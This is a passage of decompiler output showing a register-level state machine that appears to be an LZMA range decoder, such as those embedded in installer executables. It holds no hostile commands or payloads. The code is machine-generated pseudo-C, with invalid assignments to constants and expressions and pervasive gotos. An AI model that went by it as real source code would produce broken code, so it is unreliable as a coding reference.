                                                                                                                                                                                                              										case 2:
                                                                                                                                                                                                              											L24:
                                                                                                                                                                                                              											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                                                                                                                                                                                                              											 *(_t613 - 0x84) = 6;
                                                                                                                                                                                                              											 *(_t613 - 0x4c) = _t553;
                                                                                                                                                                                                              											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
                                                                                                                                                                                                              											 *(_t613 - 0x54) = _t606;
                                                                                                                                                                                                              											goto L133;
                                                                                                                                                                                                              										case 3:
                                                                                                                                                                                                              											L21:
                                                                                                                                                                                                              											__eflags =  *(_t613 - 0x6c);
                                                                                                                                                                                                              											if( *(_t613 - 0x6c) == 0) {
                                                                                                                                                                                                              												 *(_t613 - 0x88) = 3;
                                                                                                                                                                                                              												goto L170;
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                                                                                                                                              											_t67 = _t613 - 0x70;
                                                                                                                                                                                                              											 *_t67 =  &(( *(_t613 - 0x70))[1]);
                                                                                                                                                                                                              											__eflags =  *_t67;
                                                                                                                                                                                                              											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                                                                                                                                                                              											L23:
                                                                                                                                                                                                              											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                                                                                                                                                                                                              											if( *(_t613 - 0x48) != 0) {
                                                                                                                                                                                                              												goto L21;
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              											goto L24;
                                                                                                                                                                                                              										case 4:
                                                                                                                                                                                                              											L133:
                                                                                                                                                                                                              											_t531 =  *_t606;
                                                                                                                                                                                                              											_t589 = _t531 & 0x0000ffff;
                                                                                                                                                                                                              											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                                                                                                                                                                              											if( *(_t613 - 0xc) >= _t565) {
                                                                                                                                                                                                              												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                                                                                                                                                                              												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                                                                                                                                                                              												 *(_t613 - 0x40) = 1;
                                                                                                                                                                                                              												_t532 = _t531 - (_t531 >> 5);
                                                                                                                                                                                                              												 *_t606 = _t532;
                                                                                                                                                                                                              											} else {
                                                                                                                                                                                                              												 *(_t613 - 0x10) = _t565;
                                                                                                                                                                                                              												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                                                                                                                                                              												 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              											if( *(_t613 - 0x10) >= 0x1000000) {
                                                                                                                                                                                                              												goto L139;
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              										case 5:
                                                                                                                                                                                                              											goto L137;
                                                                                                                                                                                                              										case 6:
                                                                                                                                                                                                              											__edx = 0;
                                                                                                                                                                                                              											__eflags =  *(__ebp - 0x40);
                                                                                                                                                                                                              											if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                                                              												__eax =  *(__ebp - 4);
                                                                                                                                                                                                              												__ecx =  *(__ebp - 0x38);
                                                                                                                                                                                                              												 *(__ebp - 0x34) = 1;
                                                                                                                                                                                                              												 *(__ebp - 0x84) = 7;
                                                                                                                                                                                                              												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                                                                                                                                                                              												while(1) {
                                                                                                                                                                                                              													 *(_t613 - 0x54) = _t606;
                                                                                                                                                                                                              													goto L133;
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                                                                                                                                                                              											__esi =  *(__ebp - 0x60);
                                                                                                                                                                                                              											__cl = 8;
                                                                                                                                                                                                              											__cl = 8 -  *(__ebp - 0x3c);
                                                                                                                                                                                                              											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                                                                                                                                                                              											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                                                                                                                                                                              											__ecx =  *(__ebp - 0x3c);
                                                                                                                                                                                                              											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                                                                                                                                                                              											__ecx =  *(__ebp - 4);
                                                                                                                                                                                                              											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                                                                                                                                                                              											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                                                                                                                                                                              											__eflags =  *(__ebp - 0x38) - 4;
                                                                                                                                                                                                              											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                                                                                                                                              											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                                                                                                                                              											if( *(__ebp - 0x38) >= 4) {
                                                                                                                                                                                                              												__eflags =  *(__ebp - 0x38) - 0xa;
                                                                                                                                                                                                              												if( *(__ebp - 0x38) >= 0xa) {
                                                                                                                                                                                                              													_t98 = __ebp - 0x38;
                                                                                                                                                                                                              													 *_t98 =  *(__ebp - 0x38) - 6;
                                                                                                                                                                                                              													__eflags =  *_t98;
                                                                                                                                                                                                              												} else {
                                                                                                                                                                                                              													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              											} else {
                                                                                                                                                                                                              												 *(__ebp - 0x38) = 0;
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              											__eflags =  *(__ebp - 0x34) - __edx;
                                                                                                                                                                                                              											if( *(__ebp - 0x34) == __edx) {
                                                                                                                                                                                                              												__ebx = 0;
                                                                                                                                                                                                              												__ebx = 1;
                                                                                                                                                                                                              												goto L61;
                                                                                                                                                                                                              											} else {
                                                                                                                                                                                                              												__eax =  *(__ebp - 0x14);
                                                                                                                                                                                                              												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                                                                                                              												__eflags = __eax -  *(__ebp - 0x74);
                                                                                                                                                                                                              												if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                                                                                                              													__eax = __eax +  *(__ebp - 0x74);
                                                                                                                                                                                                              													__eflags = __eax;
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              												__ecx =  *(__ebp - 8);
                                                                                                                                                                                                              												__ebx = 0;
                                                                                                                                                                                                              												__ebx = 1;
                                                                                                                                                                                                              												__al =  *((intOrPtr*)(__eax + __ecx));
                                                                                                                                                                                                              												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                                                                                                                                                                              												goto L41;
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              										case 7:
                                                                                                                                                                                                              											__eflags =  *(__ebp - 0x40) - 1;
                                                                                                                                                                                                              											if( *(__ebp - 0x40) != 1) {
                                                                                                                                                                                                              												__eax =  *(__ebp - 0x24);
                                                                                                                                                                                                              												 *(__ebp - 0x80) = 0x16;
                                                                                                                                                                                                              												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                                                                                                                                              												__eax =  *(__ebp - 0x28);
                                                                                                                                                                                                              												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                                                                                                                                              												__eax =  *(__ebp - 0x2c);
                                                                                                                                                                                                              												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                                                                                                                                              												__eax = 0;
                                                                                                                                                                                                              												__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                                                                                                              												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                                                                                                                                              												__al = __al & 0x000000fd;
                                                                                                                                                                                                              												__eax = (__eflags >= 0) - 1 + 0xa;
                                                                                                                                                                                                              												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                                                                                                                                                                              												__eax =  *(__ebp - 4);
                                                                                                                                                                                                              												__eax =  *(__ebp - 4) + 0x664;
                                                                                                                                                                                                              												__eflags = __eax;
                                                                                                                                                                                                              												 *(__ebp - 0x58) = __eax;
                                                                                                                                                                                                              												goto L69;
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              											__eax =  *(__ebp - 4);
                                                                                                                                                                                                              											__ecx =  *(__ebp - 0x38);
                                                                                                                                                                                                              											 *(__ebp - 0x84) = 8;
                                                                                                                                                                                                              											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                                                                                                                                                                              											while(1) {
                                                                                                                                                                                                              												 *(_t613 - 0x54) = _t606;
                                                                                                                                                                                                              												goto L133;
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              										case 8:
                                                                                                                                                                                                              											goto L0;
                                                                                                                                                                                                              										case 9:
                                                                                                                                                                                                              											__eflags =  *(__ebp - 0x40);
                                                                                                                                                                                                              											if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                                                              												goto L89;
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              											__eflags =  *(__ebp - 0x60);
                                                                                                                                                                                                              											if( *(__ebp - 0x60) == 0) {
                                                                                                                                                                                                              												goto L171;
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              											__eax = 0;
                                                                                                                                                                                                              											__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                                                                                                              											_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                                                                                                                                                                                              											__eflags = _t258;
                                                                                                                                                                                                              											0 | _t258 = _t258 + _t258 + 9;
                                                                                                                                                                                                              											 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                                                                                                                                                                                              											goto L75;
                                                                                                                                                                                                              										case 0xa:
                                                                                                                                                                                                              											__eflags =  *(__ebp - 0x40);
                                                                                                                                                                                                              											if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                                                              												__eax =  *(__ebp - 4);
                                                                                                                                                                                                              												__ecx =  *(__ebp - 0x38);
                                                                                                                                                                                                              												 *(__ebp - 0x84) = 0xb;
                                                                                                                                                                                                              												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                                                                                                                                                                              												while(1) {
                                                                                                                                                                                                              													 *(_t613 - 0x54) = _t606;
                                                                                                                                                                                                              													goto L133;
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              											__eax =  *(__ebp - 0x28);
                                                                                                                                                                                                              											goto L88;
                                                                                                                                                                                                              										case 0xb:
                                                                                                                                                                                                              											__eflags =  *(__ebp - 0x40);
                                                                                                                                                                                                              											if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                                                              												__ecx =  *(__ebp - 0x24);
                                                                                                                                                                                                              												__eax =  *(__ebp - 0x20);
                                                                                                                                                                                                              												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                                                                                                                                              											} else {
                                                                                                                                                                                                              												__eax =  *(__ebp - 0x24);
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              											__ecx =  *(__ebp - 0x28);
                                                                                                                                                                                                              											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                                                                                                                                              											L88:
                                                                                                                                                                                                              											__ecx =  *(__ebp - 0x2c);
                                                                                                                                                                                                              											 *(__ebp - 0x2c) = __eax;
                                                                                                                                                                                                              											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                                                                                                                                              											L89:
                                                                                                                                                                                                              											__eax =  *(__ebp - 4);
                                                                                                                                                                                                              											 *(__ebp - 0x80) = 0x15;
                                                                                                                                                                                                              											__eax =  *(__ebp - 4) + 0xa68;
                                                                                                                                                                                                              											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                                                                                                                                                                              											goto L69;
                                                                                                                                                                                                              										case 0xc:
                                                                                                                                                                                                              											L99:
                                                                                                                                                                                                              											__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                                                              											if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                                                              												 *(__ebp - 0x88) = 0xc;
                                                                                                                                                                                                              												goto L170;
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              											__ecx =  *(__ebp - 0x70);
                                                                                                                                                                                                              											__eax =  *(__ebp - 0xc);
                                                                                                                                                                                                              											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                                                              											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                              											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                                                              											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                              											_t334 = __ebp - 0x70;
                                                                                                                                                                                                              											 *_t334 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                                                              											__eflags =  *_t334;
                                                                                                                                                                                                              											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                              											__eax =  *(__ebp - 0x2c);
                                                                                                                                                                                                              											goto L101;
                                                                                                                                                                                                              										case 0xd:
                                                                                                                                                                                                              											L37:
                                                                                                                                                                                                              											__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                                                              											if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                                                              												 *(__ebp - 0x88) = 0xd;
                                                                                                                                                                                                              												goto L170;
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              											__ecx =  *(__ebp - 0x70);
                                                                                                                                                                                                              											__eax =  *(__ebp - 0xc);
                                                                                                                                                                                                              											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                                                              											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                              											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                                                              											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                              											_t122 = __ebp - 0x70;
                                                                                                                                                                                                              											 *_t122 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                                                              											__eflags =  *_t122;
                                                                                                                                                                                                              											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                              											L39:
                                                                                                                                                                                                              											__eax =  *(__ebp - 0x40);
                                                                                                                                                                                                              											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                                                                                                                                              											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                                                                                                                                                                              												goto L48;
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              											__eflags = __ebx - 0x100;
                                                                                                                                                                                                              											if(__ebx >= 0x100) {
                                                                                                                                                                                                              												goto L54;
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              											L41:
                                                                                                                                                                                                              											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                                                                                                                                                                              											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                                                                                                                                                                              											__ecx =  *(__ebp - 0x58);
                                                                                                                                                                                                              											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                                                                                                                                                                              											 *(__ebp - 0x48) = __eax;
                                                                                                                                                                                                              											__eax = __eax + 1;
                                                                                                                                                                                                              											__eax = __eax << 8;
                                                                                                                                                                                                              											__eax = __eax + __ebx;
                                                                                                                                                                                                              											__esi =  *(__ebp - 0x58) + __eax * 2;
                                                                                                                                                                                                              											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                                                                              											__ax =  *__esi;
                                                                                                                                                                                                              											 *(__ebp - 0x54) = __esi;
                                                                                                                                                                                                              											__edx = __ax & 0x0000ffff;
                                                                                                                                                                                                              											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                                                                                                                                                                              											__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                                              											if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                                                                                                              												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                                                                                                              												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                                              												__cx = __ax;
                                                                                                                                                                                                              												 *(__ebp - 0x40) = 1;
                                                                                                                                                                                                              												__cx = __ax >> 5;
                                                                                                                                                                                                              												__eflags = __eax;
                                                                                                                                                                                                              												__ebx = __ebx + __ebx + 1;
                                                                                                                                                                                                              												 *__esi = __ax;
                                                                                                                                                                                                              											} else {
                                                                                                                                                                                                              												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                                                                                                                                                                              												 *(__ebp - 0x10) = __ecx;
                                                                                                                                                                                                              												0x800 = 0x800 - __edx;
                                                                                                                                                                                                              												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                                                                                                                                                              												__ebx = __ebx + __ebx;
                                                                                                                                                                                                              												 *__esi = __cx;
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                                                                              											 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                                                              											if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                                                              												goto L39;
                                                                                                                                                                                                              											} else {
                                                                                                                                                                                                              												goto L37;
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              										case 0xe:
                                                                                                                                                                                                              											L46:
                                                                                                                                                                                                              											__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                                                              											if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                                                              												 *(__ebp - 0x88) = 0xe;
                                                                                                                                                                                                              												goto L170;
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              											__ecx =  *(__ebp - 0x70);
                                                                                                                                                                                                              											__eax =  *(__ebp - 0xc);
                                                                                                                                                                                                              											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                                                              											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                              											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                                                              											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                              											_t156 = __ebp - 0x70;
                                                                                                                                                                                                              											 *_t156 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                                                              											__eflags =  *_t156;
                                                                                                                                                                                                              											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                              											while(1) {
                                                                                                                                                                                                              												L48:
                                                                                                                                                                                                              												__eflags = __ebx - 0x100;
                                                                                                                                                                                                              												if(__ebx >= 0x100) {
                                                                                                                                                                                                              													break;
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              												__eax =  *(__ebp - 0x58);
                                                                                                                                                                                                              												__edx = __ebx + __ebx;
                                                                                                                                                                                                              												__ecx =  *(__ebp - 0x10);
                                                                                                                                                                                                              												__esi = __edx + __eax;
                                                                                                                                                                                                              												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                                                                              												__ax =  *__esi;
                                                                                                                                                                                                              												 *(__ebp - 0x54) = __esi;
                                                                                                                                                                                                              												__edi = __ax & 0x0000ffff;
                                                                                                                                                                                                              												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                                                                                                              												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                                              												if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                                                                                                              													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                                                                                                              													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                                              													__cx = __ax;
                                                                                                                                                                                                              													_t170 = __edx + 1; // 0x1
                                                                                                                                                                                                              													__ebx = _t170;
                                                                                                                                                                                                              													__cx = __ax >> 5;
                                                                                                                                                                                                              													__eflags = __eax;
                                                                                                                                                                                                              													 *__esi = __ax;
                                                                                                                                                                                                              												} else {
                                                                                                                                                                                                              													 *(__ebp - 0x10) = __ecx;
                                                                                                                                                                                                              													0x800 = 0x800 - __edi;
                                                                                                                                                                                                              													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                                                                                                              													__ebx = __ebx + __ebx;
                                                                                                                                                                                                              													 *__esi = __cx;
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                                                                              												 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                                                              												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                                                              													continue;
                                                                                                                                                                                                              												} else {
                                                                                                                                                                                                              													goto L46;
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              											L54:
                                                                                                                                                                                                              											_t173 = __ebp - 0x34;
                                                                                                                                                                                                              											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                                                                                                                                                                              											__eflags =  *_t173;
                                                                                                                                                                                                              											goto L55;
                                                                                                                                                                                                              										case 0xf:
                                                                                                                                                                                                              											L58:
                                                                                                                                                                                                              											__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                                                              											if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                                                              												 *(__ebp - 0x88) = 0xf;
                                                                                                                                                                                                              												goto L170;
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              											__ecx =  *(__ebp - 0x70);
                                                                                                                                                                                                              											__eax =  *(__ebp - 0xc);
                                                                                                                                                                                                              											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                                                              											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                              											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                                                              											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                              											_t203 = __ebp - 0x70;
                                                                                                                                                                                                              											 *_t203 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                                                              											__eflags =  *_t203;
                                                                                                                                                                                                              											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                              											L60:
                                                                                                                                                                                                              											__eflags = __ebx - 0x100;
                                                                                                                                                                                                              											if(__ebx >= 0x100) {
                                                                                                                                                                                                              												L55:
                                                                                                                                                                                                              												__al =  *(__ebp - 0x44);
                                                                                                                                                                                                              												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                                                                                                                                                                              												goto L56;
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              											L61:
                                                                                                                                                                                                              											__eax =  *(__ebp - 0x58);
                                                                                                                                                                                                              											__edx = __ebx + __ebx;
                                                                                                                                                                                                              											__ecx =  *(__ebp - 0x10);
                                                                                                                                                                                                              											__esi = __edx + __eax;
                                                                                                                                                                                                              											__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                                                                              											__ax =  *__esi;
                                                                                                                                                                                                              											 *(__ebp - 0x54) = __esi;
                                                                                                                                                                                                              											__edi = __ax & 0x0000ffff;
                                                                                                                                                                                                              											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                                                                                                              											__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                                              											if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                                                                                                              												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                                                                                                              												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                                              												__cx = __ax;
                                                                                                                                                                                                              												_t217 = __edx + 1; // 0x1
                                                                                                                                                                                                              												__ebx = _t217;
                                                                                                                                                                                                              												__cx = __ax >> 5;
                                                                                                                                                                                                              												__eflags = __eax;
                                                                                                                                                                                                              												 *__esi = __ax;
                                                                                                                                                                                                              											} else {
                                                                                                                                                                                                              												 *(__ebp - 0x10) = __ecx;
                                                                                                                                                                                                              												0x800 = 0x800 - __edi;
                                                                                                                                                                                                              												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                                                                                                              												__ebx = __ebx + __ebx;
                                                                                                                                                                                                              												 *__esi = __cx;
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                                                                              											 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                                                              											if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                                                              												goto L60;
                                                                                                                                                                                                              											} else {
                                                                                                                                                                                                              												goto L58;
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              										case 0x10:
                                                                                                                                                                                                              											L109:
                                                                                                                                                                                                              											__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                                                              											if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                                                              												 *(__ebp - 0x88) = 0x10;
                                                                                                                                                                                                              												goto L170;
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              											__ecx =  *(__ebp - 0x70);
                                                                                                                                                                                                              											__eax =  *(__ebp - 0xc);
                                                                                                                                                                                                              											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                                                              											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                              											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                                                              											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                              											_t365 = __ebp - 0x70;
                                                                                                                                                                                                              											 *_t365 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                                                              											__eflags =  *_t365;
                                                                                                                                                                                                              											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                              											goto L111;
                                                                                                                                                                                                              										case 0x11:
                                                                                                                                                                                                              											L69:
                                                                                                                                                                                                              											__esi =  *(__ebp - 0x58);
                                                                                                                                                                                                              											 *(__ebp - 0x84) = 0x12;
                                                                                                                                                                                                              											while(1) {
                                                                                                                                                                                                              												 *(_t613 - 0x54) = _t606;
                                                                                                                                                                                                              												goto L133;
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              										case 0x12:
                                                                                                                                                                                                              											__eflags =  *(__ebp - 0x40);
                                                                                                                                                                                                              											if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                                                              												__eax =  *(__ebp - 0x58);
                                                                                                                                                                                                              												 *(__ebp - 0x84) = 0x13;
                                                                                                                                                                                                              												__esi =  *(__ebp - 0x58) + 2;
                                                                                                                                                                                                              												while(1) {
                                                                                                                                                                                                              													 *(_t613 - 0x54) = _t606;
                                                                                                                                                                                                              													goto L133;
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              											__eax =  *(__ebp - 0x4c);
                                                                                                                                                                                                              											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                                                                                                                                                                              											__ecx =  *(__ebp - 0x58);
                                                                                                                                                                                                              											__eax =  *(__ebp - 0x4c) << 4;
                                                                                                                                                                                                              											__eflags = __eax;
                                                                                                                                                                                                              											__eax =  *(__ebp - 0x58) + __eax + 4;
                                                                                                                                                                                                              											goto L130;
                                                                                                                                                                                                              										case 0x13:
                                                                                                                                                                                                              											__eflags =  *(__ebp - 0x40);
                                                                                                                                                                                                              											if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                                                              												_t469 = __ebp - 0x58;
                                                                                                                                                                                                              												 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                                                                                                                                                                              												__eflags =  *_t469;
                                                                                                                                                                                                              												 *(__ebp - 0x30) = 0x10;
                                                                                                                                                                                                              												 *(__ebp - 0x40) = 8;
                                                                                                                                                                                                              												L144:
                                                                                                                                                                                                              												 *(__ebp - 0x7c) = 0x14;
                                                                                                                                                                                                              												goto L145;
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              											__eax =  *(__ebp - 0x4c);
                                                                                                                                                                                                              											__ecx =  *(__ebp - 0x58);
                                                                                                                                                                                                              											__eax =  *(__ebp - 0x4c) << 4;
                                                                                                                                                                                                              											 *(__ebp - 0x30) = 8;
